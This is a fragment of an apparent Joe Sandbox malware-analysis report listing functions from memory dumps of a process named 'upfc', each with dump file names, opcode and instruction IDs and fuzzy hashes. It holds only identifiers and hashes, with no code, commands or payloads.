                                • Instruction Fuzzy Hash: C951DF30B1CA4A4FDB58EF5888645BA7BE2FF98304B15417EE45EC7292DE34E8028781
                                Function 00007FFD9B892CD9 Relevance: .2, Instructions: 166COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.1775880056.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ffd9b890000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 766d265d79f9496ad394a69d3b31e02c2a570ff63ddfaedcbca4325fc7962cbb
                                • Instruction ID: 6d8dfea8d2cdd6d298ea77315260bd8880437bb092d34738c79a2489b3203890
                                • Opcode Fuzzy Hash: 766d265d79f9496ad394a69d3b31e02c2a570ff63ddfaedcbca4325fc7962cbb
                                • Instruction Fuzzy Hash: AC513071A1995D8FDF98EF98C865AECBBB1FF59300F41016AE00DE7292CA64A941CB40
                                Function 00007FFD9B891C19 Relevance: .2, Instructions: 160COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.1775880056.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ffd9b890000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 55a0e268796f4b64baa5b4d51c6c7e3f00e8f49d5262bb8f48b7faca35801fe1
                                • Instruction ID: 98d6e1b0eb4c209e4902a61f42740d4ae582d5833e0577e0bc96e71af8e1c875
                                • Opcode Fuzzy Hash: 55a0e268796f4b64baa5b4d51c6c7e3f00e8f49d5262bb8f48b7faca35801fe1
                                • Instruction Fuzzy Hash: A1519E31A0E64D8FDB55EB64C8A46EC7FB0FF49300F4501AAD018D72E2DB78AA49CB51
                                Function 00007FFD9B89238D Relevance: .2, Instructions: 158COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.1775880056.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ffd9b890000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 62e3c5a4c82a0c16177431d970070f1a37d10d7ccc4576e654ae7069bd9dc73a
                                • Instruction ID: 04aa412fb618d6cc5e2cd2dda01048ff502cad37fb359e7021d4d01b4964f58f
                                • Opcode Fuzzy Hash: 62e3c5a4c82a0c16177431d970070f1a37d10d7ccc4576e654ae7069bd9dc73a
                                • Instruction Fuzzy Hash: A551E461A0E69D4FEBA5DBA88C653A87FA0EF59300F0540F7D08CC71E7DE246A85C741
                                Function 00007FFD9B892B35 Relevance: .1, Instructions: 148COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.1775880056.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ffd9b890000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 069d52d3d37840b395613956da84a354ef85efeaeabfb40ca603acde7f3092a6
                                • Instruction ID: 0c03fe8d57350d0d88901ecb8f4fc08343116528a43cf04ee996d5195bab1ec8
                                • Opcode Fuzzy Hash: 069d52d3d37840b395613956da84a354ef85efeaeabfb40ca603acde7f3092a6
                                • Instruction Fuzzy Hash: F5517D3090E68D8FDB59DFA4C8646ED7BB0FF49300F0401AAE458E71A2DB389955CB41
                                Function 00007FFD9B891ECD Relevance: .1, Instructions: 143COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.1775880056.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ffd9b890000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5d70527b1c1679b4decb2e1b786704979442808a0197cc12023cd2289780edd9
                                • Instruction ID: 22b21340b841302e083c3f635f45ec06154632d876f515ce6b32dd2d02100267
                                • Opcode Fuzzy Hash: 5d70527b1c1679b4decb2e1b786704979442808a0197cc12023cd2289780edd9
                                • Instruction Fuzzy Hash: EF419D3195E3CD5FDB16AB248C655E97FB0EF06200F4A02EBD454CB0E3DB68A959C742
                                Function 00007FFD9B891828 Relevance: .1, Instructions: 116COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.1775880056.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ffd9b890000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4b51f7e60d3350ac25d8c13ccd9141fe7a562832c3c6d7d41cddc122ee70e97d
                                • Instruction ID: db19cc34c88909f789a19a9b7b91aab49195fa7926c1dd84f6bcf130e09ce503
                                • Opcode Fuzzy Hash: 4b51f7e60d3350ac25d8c13ccd9141fe7a562832c3c6d7d41cddc122ee70e97d
                                • Instruction Fuzzy Hash: 42319231E1E61E9AEB74BB9084217F8B6A1FF4A700F410279D05EA21E1CF396A45DA80
                                Function 00007FFD9B8964E9 Relevance: .1, Instructions: 105COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.1775880056.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ffd9b895000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 57e17bd36f52d11c793c79a6c323401c75ca8833d13482f49bf2320f519156fb
                                • Instruction ID: 3fc351231a2679cf2e0660ce9c5cf83423c233ea2b6da79283a002843781dd15
                                • Opcode Fuzzy Hash: 57e17bd36f52d11c793c79a6c323401c75ca8833d13482f49bf2320f519156fb
                                • Instruction Fuzzy Hash: 20418E70D0964D8FEB55DFA4C864AEDBBB1FF49300F5101BAD009D72AACB399981CB41
                                Function 00007FFD9B895FDD Relevance: .1, Instructions: 105COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.1775880056.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ffd9b895000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0a3b02a1b098205d4ee76b923801b7ce87a6013925e8e87d014cdce61eec16f7
                                • Instruction ID: 31aad0d26fff5bf8b9be1340ad5365c4c3f7f47181719dbb675aef52bbd1dd6c
                                • Opcode Fuzzy Hash: 0a3b02a1b098205d4ee76b923801b7ce87a6013925e8e87d014cdce61eec16f7
                                • Instruction Fuzzy Hash: 18415B70E1464D8FEB94EFE8D865AEDBBB1FF48310F01057AE018E3296DA346941CB91
                                Function 00007FFD9B8983F5 Relevance: .1, Instructions: 103COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.1775880056.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ffd9b895000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 99c0262603d91a9ea39d09b7c094d3488feff8f389ed7e6ffd21d9008cfcebda
                                • Instruction ID: 77324e5495c0a7a0b425c01f77cadd2a5dab6cb6746e1ea17c5bbb6b7b50d011
                                • Opcode Fuzzy Hash: 99c0262603d91a9ea39d09b7c094d3488feff8f389ed7e6ffd21d9008cfcebda
                                • Instruction Fuzzy Hash: B9314A31E0961E8FDB58DFA4D464AFDBBB1EF58300F11017AE019A32D1CA385A41CB90
                                Function 00007FFD9B895A29 Relevance: .1, Instructions: 103COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.1775880056.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ffd9b895000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 25778b5c204df689b6f8b5cf4bead04f6aeb4134b8244d8ca55c6f89569ac112
                                • Instruction ID: 50f94c20afba97c577d019bcd333928ea850b6f54ad37874403ca494c360be23
                                • Opcode Fuzzy Hash: 25778b5c204df689b6f8b5cf4bead04f6aeb4134b8244d8ca55c6f89569ac112
                                • Instruction Fuzzy Hash: 31314C71A09A0D8FDB98EF9CD495AADB7F1FF99310F10057AE01DD7295CA35A8428B40
                                Function 00007FFD9B895931 Relevance: .1, Instructions: 93COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.1775880056.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ffd9b895000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f050772d1fc58c106b711f8a2ef1998c71bcb0b6a8a83d3c6c5a16295119c2f2
                                • Instruction ID: cdabd347700fa9d902e8706a9dfc7ce92048c4eae4afe0ba23693087a7bfccd3
                                • Opcode Fuzzy Hash: f050772d1fc58c106b711f8a2ef1998c71bcb0b6a8a83d3c6c5a16295119c2f2
                                • Instruction Fuzzy Hash: DF31342090F7CE1FEB529BB4C824AA47FA1DF4A310F0900EED089DB193C9185905C352
                                Function 00007FFD9B8911F5 Relevance: .1, Instructions: 67COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.1775880056.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ffd9b890000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7d5f93b4205607a888e7b16b196c667f331f2858d0b30f5323803bfb937bf902
                                • Instruction ID: 0999c92b27b7fe39b4e8a0fa55d204da2e1bcab19070e233767d4d583e7fc2e0
                                • Opcode Fuzzy Hash: 7d5f93b4205607a888e7b16b196c667f331f2858d0b30f5323803bfb937bf902
                                • Instruction Fuzzy Hash: 6F11233190D78C8FCB66EF6488651E53FA0FF1A300F4501EAD418C7192DB7AEA1AC741
                                Function 00007FFD9B89186A Relevance: .1, Instructions: 64COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.1775880056.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ffd9b890000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1c17de91ca9b8be5cdb870773bec5cce0768cac71f679ca07555ecfd44bdc8c6
                                • Instruction ID: 562591556a54ec7001ce8ba259cf442e61daf040747a8a2d11776369b527ace2
                                • Opcode Fuzzy Hash: 1c17de91ca9b8be5cdb870773bec5cce0768cac71f679ca07555ecfd44bdc8c6
                                • Instruction Fuzzy Hash: 93110D31E1A52D8EDB68EB60D4617FCB671FF06701F8114B9D04EA6192CE356A44DB40
                                Function 00007FFD9B890C05 Relevance: .1, Instructions: 57COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.1775880056.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ffd9b890000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a094eb0dd4be21299e14451f103add3926770b8361d42afd13b019a2d38600fb
                                • Instruction ID: a904857749c1d3e11ccb3306f9b1ba06789c5368dc8bac9e10874d9f50b8999c
                                • Opcode Fuzzy Hash: a094eb0dd4be21299e14451f103add3926770b8361d42afd13b019a2d38600fb
                                • Instruction Fuzzy Hash: 23112332F1590E8ECF68EB94D8647EDB761FF49300F80027AD019EB1A5CD3469418B80
                                Function 00007FFD9B898399 Relevance: .0, Instructions: 35COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.1775880056.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ffd9b895000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5323973dc65b892b79f898e6d15493672a742f7f218d1c1646b69b4a1e5f3983
                                • Instruction ID: 4048d96800965dfb7060e78b7be9f0d8d69aafa579e19a1f6fbbc2c03cad8fd4
                                • Opcode Fuzzy Hash: 5323973dc65b892b79f898e6d15493672a742f7f218d1c1646b69b4a1e5f3983
                                • Instruction Fuzzy Hash: 21F03C3191D68E8FDB51EB6888686ED7FF0FF1A304F0505ABD458D70A2DB345544CB51
                                Function 00007FFD9B890528 Relevance: .0, Instructions: 31COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.1775880056.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ffd9b890000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b8e267296c9e6a976d963006d9e951a6ed4ef50fb6d847b1bf05fc0b0241325c
                                • Instruction ID: c73a1cfb75593f64e3e0008c71f261493adb5a5bc827a0156a1bef8181961530
                                • Opcode Fuzzy Hash: b8e267296c9e6a976d963006d9e951a6ed4ef50fb6d847b1bf05fc0b0241325c
                                • Instruction Fuzzy Hash: 84F05E3050960E8FDB55EF9494116E577A0FF59304F000176E41CD2195CA35A660C781
                                Function 00007FFD9B8981E0 Relevance: .0, Instructions: 29COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.1775880056.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ffd9b895000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 885604a77612b4007665538a6f7475fabccb69192ee82b013977f59083f09ceb
                                • Instruction ID: e2ec2e70e633c6ae88e18efbee7d7a10bc5649352f1e22dd7151f5da005ff06a
                                • Opcode Fuzzy Hash: 885604a77612b4007665538a6f7475fabccb69192ee82b013977f59083f09ceb
                                • Instruction Fuzzy Hash: 31E06832A49D0D8BCF609F98AC102843BB1FB4D304F01026DE04CC3180D3355E52C300
                                Function 00007FFD9B89685C Relevance: .0, Instructions: 29COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.1775880056.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ffd9b895000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: eb421aba41ecdfd5ea69e883e024c37e4698630aab55df376e19af45b9b23214
                                • Instruction ID: 716a5aa4a74f656992352075b491c820e1c1d6a9f034f43921e73d89af15dad2
                                • Opcode Fuzzy Hash: eb421aba41ecdfd5ea69e883e024c37e4698630aab55df376e19af45b9b23214
                                • Instruction Fuzzy Hash: CFE06872A09A0C4BDB509F9CAC6028837A0FB4C308F010269D44CD7180D3215544C301
                                Function 00007FFD9B892536 Relevance: .0, Instructions: 27COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.1775880056.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ffd9b890000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cde9f3b9f01c2043dad3e9abcf401ef49ba10224e570a95f6b0d20606ad56024
                                • Instruction ID: 7062e36172873bf674dae81c57bafc884f0066ed4c94b0c33cb304f595c12b0f
                                • Opcode Fuzzy Hash: cde9f3b9f01c2043dad3e9abcf401ef49ba10224e570a95f6b0d20606ad56024
                                • Instruction Fuzzy Hash: 76F0A271A1495E4FDFA8DF58C895BA9B7B1FB58340F1086E6900DE3255DE30AEC58F80
                                Function 00007FFD9B890530 Relevance: .0, Instructions: 21COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.1775880056.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ffd9b890000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4052877536065a422ffdacf6b0f575e94888fbc971f21f8d59286a0c27209402
                                • Instruction ID: f30041032725aa9d0cdc4c1f37f2548c3d31e79fd394116e7dc55691a201d6d8
                                • Opcode Fuzzy Hash: 4052877536065a422ffdacf6b0f575e94888fbc971f21f8d59286a0c27209402
                                • Instruction Fuzzy Hash: 57E04F3050960ECFDFA4FF58C4506A67BA1FF58344F100539E41CD2190CB35E6A0CB80
                                Function 00007FFD9B890C65 Relevance: .0, Instructions: 19COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.1775880056.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ffd9b890000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a884626f86cfb9ab010e658f794663223cbdcc20bf5a2e8eeed2223e12a540a6
                                • Instruction ID: 84043ac73458fc3b0d7578f5f41c7d3ffce7e21f713234071953ad2877c8f771
                                • Opcode Fuzzy Hash: a884626f86cfb9ab010e658f794663223cbdcc20bf5a2e8eeed2223e12a540a6
                                • Instruction Fuzzy Hash: D8D0EC31B0551D4ECB54EA88E8507EDB771EB85311F8001B2C10CE3155CA3059518B81